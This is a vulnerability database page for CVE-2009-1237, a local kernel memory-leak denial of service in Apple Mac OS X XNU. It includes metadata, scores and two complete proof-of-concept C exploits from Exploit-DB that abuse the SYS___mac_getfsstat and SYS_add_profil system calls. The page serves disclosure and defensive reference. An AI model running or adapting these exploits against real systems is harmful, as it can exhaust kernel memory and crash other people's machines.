CVE-2009-1237 : Detail

CVE-2009-1237

0.24%V4
Local
2009-04-02
15h00 +00:00
2017-09-28
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple memory leaks in XNU 1228.3.13 and earlier on Apple Mac OS X 10.5.6 and earlier allow local users to cause a denial of service (kernel memory consumption) via a crafted (1) SYS_add_profil or (2) SYS___mac_getfsstat system call.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 8263

Publication date : 2009-03-22 23h00 +00:00
Author : mu-b
EDB Verified : Yes

/* xnu-macfsstat-leak.c * * Copyright (c) 2008 by <mu-b@digit-labs.org> * * Apple MACOS X xnu <= 1228.3.13 local kernel memory leak/DoS POC * by mu-b - Sun 13 Apr 2008 * * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386) * Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386) * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <sys/mount.h> #include <sys/syscall.h> #include <sys/utsname.h> #include <unistd.h> #define LEAK_BUFBYTES(a) (sizeof (struct statfs)*a) #define LEAK_MACBYTES(a) (sizeof (int)*a) struct __mac_getfsstat { char *buf; char _pad[4]; int bufsize; char __pad[4]; char *mac; char ___pad[4]; int macsize; char ____pad[4]; int flags; char _____pad[4]; }; int main (int argc, char **argv) { struct __mac_getfsstat req; int i, n; printf ("Apple MACOS X xnu <= 1228.3.13 local kernel memory leak/DoS PoC\n" "by: <mu-b@digit-labs.org>\n" "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); memset (&req, 0, sizeof req); req.buf = (char *) 0xDEADBEEF; req.bufsize = LEAK_BUFBYTES (65536 * 64); req.mac = (char *) 0xDEADBEEF; req.macsize = LEAK_MACBYTES (65536 * 64); for (i = 0; i < 2; i++) { if ((n = syscall (SYS___mac_getfsstat, req.buf, req.bufsize, req.mac, req.macsize, req.flags)) < 0) { fprintf (stderr, "leaked %lu-bytes of kernel memory!\n", LEAK_MACBYTES (65536 * 64)); } } return (EXIT_SUCCESS); } // milw0rm.com [2009-03-23]
Exploit Database EDB-ID : 8264

Publication date : 2009-03-22 23h00 +00:00
Author : mu-b
EDB Verified : Yes

/* xnu-profil-leak.c * * Copyright (c) 2008 by <mu-b@digit-labs.org> * * Apple MACOS X xnu <= 1228.3.13 local kernel memory leak/DoS POC * by mu-b - Sat 16 Feb 2008 * * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386) * Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386) * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <sys/syscall.h> #include <unistd.h> /* profil defines */ #define PROFIL_LEAK_NUM 65536 * 128 int main (int argc, char **argv) { char buf[1024]; int i, n; printf ("Apple MACOS X xnu <= 1228.3.13 local kernel memory leak/DoS PoC\n" "by: <mu-b@digit-labs.org>\n" "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); printf ("* opening profil, pid: %d...", getpid ()); if ((n = syscall (SYS_profil, &buf, sizeof buf, 0, 1)) < 0) { fprintf (stderr, "\n%s: syscall [SYS_profil]: failed: %d\n", argv[0], n); exit (EXIT_FAILURE); } printf ("done\n"); printf ("* filling %d-bytes of kernel memory...\n", PROFIL_LEAK_NUM * 32); fflush (stdout); for (i = 0; i < PROFIL_LEAK_NUM; i++) { if ((n = syscall (SYS_add_profil, &buf, sizeof buf, 0, 1)) < 0) { fprintf (stderr, "\n%s: syscall [SYS_add_profil]: failed: %d\n", argv[0], n); exit (EXIT_FAILURE); } printf ("** %d-bytes filled\r", i * 32); } printf ("\n* done\n"); while (1) sleep (1); return (EXIT_SUCCESS); } // milw0rm.com [2009-03-23]

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version To (including) 10.5.6

Apple>>Mac_os_x >> Version 10.0

Apple>>Mac_os_x >> Version 10.0.0

Apple>>Mac_os_x >> Version 10.0.1

Apple>>Mac_os_x >> Version 10.0.2

Apple>>Mac_os_x >> Version 10.0.3

Apple>>Mac_os_x >> Version 10.0.4

Apple>>Mac_os_x >> Version 10.1

Apple>>Mac_os_x >> Version 10.1.0

Apple>>Mac_os_x >> Version 10.1.1

Apple>>Mac_os_x >> Version 10.1.2

Apple>>Mac_os_x >> Version 10.1.3

Apple>>Mac_os_x >> Version 10.1.4

Apple>>Mac_os_x >> Version 10.1.5

Apple>>Mac_os_x >> Version 10.2

Apple>>Mac_os_x >> Version 10.2.0

Apple>>Mac_os_x >> Version 10.2.1

Apple>>Mac_os_x >> Version 10.2.2

Apple>>Mac_os_x >> Version 10.2.3

Apple>>Mac_os_x >> Version 10.2.4

Apple>>Mac_os_x >> Version 10.2.5

Apple>>Mac_os_x >> Version 10.2.6

Apple>>Mac_os_x >> Version 10.2.7

Apple>>Mac_os_x >> Version 10.2.8

Apple>>Mac_os_x >> Version 10.3

Apple>>Mac_os_x >> Version 10.3.0

Apple>>Mac_os_x >> Version 10.3.1

Apple>>Mac_os_x >> Version 10.3.2

Apple>>Mac_os_x >> Version 10.3.3

Apple>>Mac_os_x >> Version 10.3.4

Apple>>Mac_os_x >> Version 10.3.5

Apple>>Mac_os_x >> Version 10.3.6

Apple>>Mac_os_x >> Version 10.3.7

Apple>>Mac_os_x >> Version 10.3.8

Apple>>Mac_os_x >> Version 10.3.9

Apple>>Mac_os_x >> Version 10.4

Apple>>Mac_os_x >> Version 10.4.0

Apple>>Mac_os_x >> Version 10.4.1

Apple>>Mac_os_x >> Version 10.4.2

Apple>>Mac_os_x >> Version 10.4.3

Apple>>Mac_os_x >> Version 10.4.4

Apple>>Mac_os_x >> Version 10.4.5

Apple>>Mac_os_x >> Version 10.4.6

Apple>>Mac_os_x >> Version 10.4.7

Apple>>Mac_os_x >> Version 10.4.8

Apple>>Mac_os_x >> Version 10.4.8

    Apple>>Mac_os_x >> Version 10.4.8

      Apple>>Mac_os_x >> Version 10.4.8

        Apple>>Mac_os_x >> Version 10.4.9

        Apple>>Mac_os_x >> Version 10.4.10

        Apple>>Mac_os_x >> Version 10.4.11

        Apple>>Mac_os_x >> Version 10.5

        Apple>>Mac_os_x >> Version 10.5.0

        Apple>>Mac_os_x >> Version 10.5.1

        Apple>>Mac_os_x >> Version 10.5.2

        Apple>>Mac_os_x >> Version 10.5.2

          Apple>>Mac_os_x >> Version 10.5.3

          Apple>>Mac_os_x >> Version 10.5.4

          Apple>>Mac_os_x >> Version 10.5.5

          Apple>>Mac_os_x_server >> Version To (including) 10.5.6

          Apple>>Mac_os_x_server >> Version 10.0

          Apple>>Mac_os_x_server >> Version 10.0.0

          Apple>>Mac_os_x_server >> Version 10.0.1

          Apple>>Mac_os_x_server >> Version 10.0.2

          Apple>>Mac_os_x_server >> Version 10.0.3

          Apple>>Mac_os_x_server >> Version 10.0.4

          Apple>>Mac_os_x_server >> Version 10.1

          Apple>>Mac_os_x_server >> Version 10.1.0

          Apple>>Mac_os_x_server >> Version 10.1.1

          Apple>>Mac_os_x_server >> Version 10.1.2

          Apple>>Mac_os_x_server >> Version 10.1.3

          Apple>>Mac_os_x_server >> Version 10.1.4

          Apple>>Mac_os_x_server >> Version 10.1.5

          Apple>>Mac_os_x_server >> Version 10.2

          Apple>>Mac_os_x_server >> Version 10.2.0

          Apple>>Mac_os_x_server >> Version 10.2.1

          Apple>>Mac_os_x_server >> Version 10.2.2

          Apple>>Mac_os_x_server >> Version 10.2.3

          Apple>>Mac_os_x_server >> Version 10.2.4

          Apple>>Mac_os_x_server >> Version 10.2.5

          Apple>>Mac_os_x_server >> Version 10.2.6

          Apple>>Mac_os_x_server >> Version 10.2.7

          Apple>>Mac_os_x_server >> Version 10.2.8

          Apple>>Mac_os_x_server >> Version 10.3

          Apple>>Mac_os_x_server >> Version 10.3.0

          Apple>>Mac_os_x_server >> Version 10.3.1

          Apple>>Mac_os_x_server >> Version 10.3.2

          Apple>>Mac_os_x_server >> Version 10.3.3

          Apple>>Mac_os_x_server >> Version 10.3.4

          Apple>>Mac_os_x_server >> Version 10.3.5

          Apple>>Mac_os_x_server >> Version 10.3.6

          Apple>>Mac_os_x_server >> Version 10.3.7

          Apple>>Mac_os_x_server >> Version 10.3.8

          Apple>>Mac_os_x_server >> Version 10.3.9

          Apple>>Mac_os_x_server >> Version 10.4

          Apple>>Mac_os_x_server >> Version 10.4.0

          Apple>>Mac_os_x_server >> Version 10.4.1

          Apple>>Mac_os_x_server >> Version 10.4.2

          Apple>>Mac_os_x_server >> Version 10.4.3

          Apple>>Mac_os_x_server >> Version 10.4.4

          Apple>>Mac_os_x_server >> Version 10.4.5

          Apple>>Mac_os_x_server >> Version 10.4.6

          Apple>>Mac_os_x_server >> Version 10.4.7

          Apple>>Mac_os_x_server >> Version 10.4.8

          Apple>>Mac_os_x_server >> Version 10.4.9

          Apple>>Mac_os_x_server >> Version 10.4.10

          Apple>>Mac_os_x_server >> Version 10.4.11

          Apple>>Mac_os_x_server >> Version 10.5

          Apple>>Mac_os_x_server >> Version 10.5.0

          Apple>>Mac_os_x_server >> Version 10.5.1

          Apple>>Mac_os_x_server >> Version 10.5.2

          Apple>>Mac_os_x_server >> Version 10.5.3

          Apple>>Mac_os_x_server >> Version 10.5.4

          Apple>>Mac_os_x_server >> Version 10.5.5

          References

          https://www.exploit-db.com/exploits/8264
          Tags : exploit, x_refsource_EXPLOIT-DB
          http://www.securityfocus.com/bid/34202
          Tags : vdb-entry, x_refsource_BID
          https://www.exploit-db.com/exploits/8263
          Tags : exploit, x_refsource_EXPLOIT-DB
          http://secunia.com/advisories/34424
          Tags : third-party-advisory, x_refsource_SECUNIA